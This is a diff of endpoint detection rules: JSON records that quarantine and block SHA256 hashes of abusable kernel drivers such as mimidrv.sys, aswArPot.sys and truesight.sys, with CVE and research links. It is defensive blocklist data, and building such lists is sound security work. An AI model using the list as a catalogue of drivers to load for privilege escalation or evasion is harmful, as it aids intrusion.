+ "hl_testing_start_time": "2026-03-23T11:45:30.469896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "261969a99718fc68b576eb7b58dbdf7c7a781c8f4572b7a77a0be0eec4b32dc2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "159b81ef-6fda-5a96-97c9-47533b1d70bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822459Z",
+ "creation_date": "2026-03-23T11:45:30.822461Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19f89530b8caf720c91c82977132bb1fb2afe695b426b51a1ae1b35570805f32",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15a8ee87-b2f1-5591-acb9-d68975604258",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977712Z",
+ "creation_date": "2026-03-23T11:45:29.977714Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3efcf47681d9f96afcbc843a241c21a643b173c48270446f6fe634991a57847",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15b47584-370d-5500-886a-85b11f589c90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143429Z",
+ "creation_date": "2026-03-23T11:45:32.143432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9418b5e90a235339a4a1a889490faca39cd117a51ba4446daa1011da06c7ecd",
+ "comment": "Vulnerable Kernel Driver (aka GPU-Z.sys) [https://www.loldrivers.io/drivers/0d6f1b0f-b94d-4254-b3bb-49de61246260/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15ba9560-f528-5d70-bb3c-9d4b58c08e72",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968580Z",
+ "creation_date": "2026-03-23T11:45:29.968582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36e3127f045ef1fa7426a3ff8c441092d3b66923d2b69826034e48306609e289",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15c9c212-ee5a-5437-a41e-ceda62d0aa84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604538Z",
+ "creation_date": "2026-03-23T11:45:29.604540Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0376d4554b4828a7e3721327cb4c9977301c02eb8c50d10d376d3be623d71e3a",
+ "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15d0fd27-5812-53ba-a9d1-3bf24cf29c61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468849Z",
+ "creation_date": "2026-03-23T11:45:30.468852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc732dc22d0521fce33ed9c37359f702c985d2f35bc00209c3a4a076d6ff564d",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15da0706-be96-50c0-b884-b192e24d2182",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974713Z",
+ "creation_date": "2026-03-23T11:45:29.974715Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "886b28af7d2907a61720da0b6ea5d88a9a8512ceb120e88889f3fedd6bf313b4",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15ff4712-7fef-566f-9e5c-7be664522f3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973552Z",
+ "creation_date": "2026-03-23T11:45:29.973554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c4207c90c97733fae2a08679d63fbbe94dfcf96fdfdf88406aa7ab3f80ea78f",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "160086d3-7131-5956-a08f-3c7c1c54993b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621298Z",
+ "creation_date": "2026-03-23T11:45:29.621300Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8",
+ "comment": "ASUSTeK vulnerable physmem driver (aka AsIO64.sys) [https://www.loldrivers.io/drivers/79692987-1dd0-41a0-a560-9a0441922e5a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16137621-a1e4-520b-b398-6845f3c6b427",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826318Z",
+ "creation_date": "2026-03-23T11:45:30.826320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826326Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b836d9305dd22387514c2e1507cf36646c11abf088088bc3f7e6ede49113fcdb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16157b50-8677-5e5a-9679-385642f57acf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830926Z",
+ "creation_date": "2026-03-23T11:45:30.830929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c861174040ee2b28e4f79fa1d5829356f8e728a4913d41c217d15a1742636f32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1616d13c-ab3f-5b1c-a737-6c63860c4a8b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472080Z",
+ "creation_date": "2026-03-23T11:45:31.472084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472093Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b568c4e4c1c7dd554cfdf07bf0132f3465a4afeed5a9ce706edcf7860b26f0a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1627cb79-875d-5ba1-9838-c6cf4ed90875",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612699Z",
+ "creation_date": "2026-03-23T11:45:29.612701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d5ded14ba7821a1021815e70399801bf87dadf9b9eb17325e3c918d53971c8e",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1638ff1f-2991-5296-b351-7177cfd89412",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814747Z",
+ "creation_date": "2026-03-23T11:45:31.814751Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eaf8ebd8ded6b90d0a18a8ba64a0e8204da93ff0012b119dc509fa4167b0098a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "163db276-568f-529a-866a-2c1977160f7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477957Z",
+ "creation_date": "2026-03-23T11:45:30.477960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "633ae4822602acd252ff23e73ef4cc98130f3e3988ac459f7fda5102fcef5fce",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "163e58a7-c43c-5aa6-a62d-1cba52cd4c38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144909Z",
+ "creation_date": "2026-03-23T11:45:31.144911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "924de0ef972f4db7bee5f24f32b558a8fe7e7fe7bfdcaca1c7996a0cb67e33b1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "164192c9-6a0d-5bcd-8512-65371ed020dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622036Z",
+ "creation_date": "2026-03-23T11:45:29.622038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92edd48dfac025d4069eb6491b9730d9d131b77cceaa480af9b3c32bc8c5e3a9",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "16467a79-82c0-5c3d-a3dc-b5004a2c40f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144499Z",
+ "creation_date": "2026-03-23T11:45:31.144501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b82e0c2e81f47754b5af6a366725ed07b283699873663806d3a375e9fdcf9d2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1662785f-79ee-5539-9c0a-d839d9f11efd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834028Z",
+ "creation_date": "2026-03-23T11:45:30.834031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f3c0232f43e940cf8e7dca3ef30eb202bfbcc5c22b1f4aec5eac93fa1bb8764",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "166aef44-aa84-596c-a4d9-11e00b2013c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970157Z",
+ "creation_date": "2026-03-23T11:45:29.970160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60f79c1b60a74b98b4f436d6bbbf5aeb9ce6febbe1443d318eea7581962b75a4",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1671a50f-38ac-5c13-9932-47f8a0f78862",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828359Z",
+ "creation_date": "2026-03-23T11:45:31.828362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e02a5f2f9e809dc4b43f1efd738468dd2d4c2ece245e79e53a573cdcdb4dcb6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1675de5b-12f8-5adc-b16b-13199706802b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473295Z",
+ "creation_date": "2026-03-23T11:45:31.473298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0099c687fd570537a97703491cf4d58c0aa7263dffa84f04f563e0abf871235c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
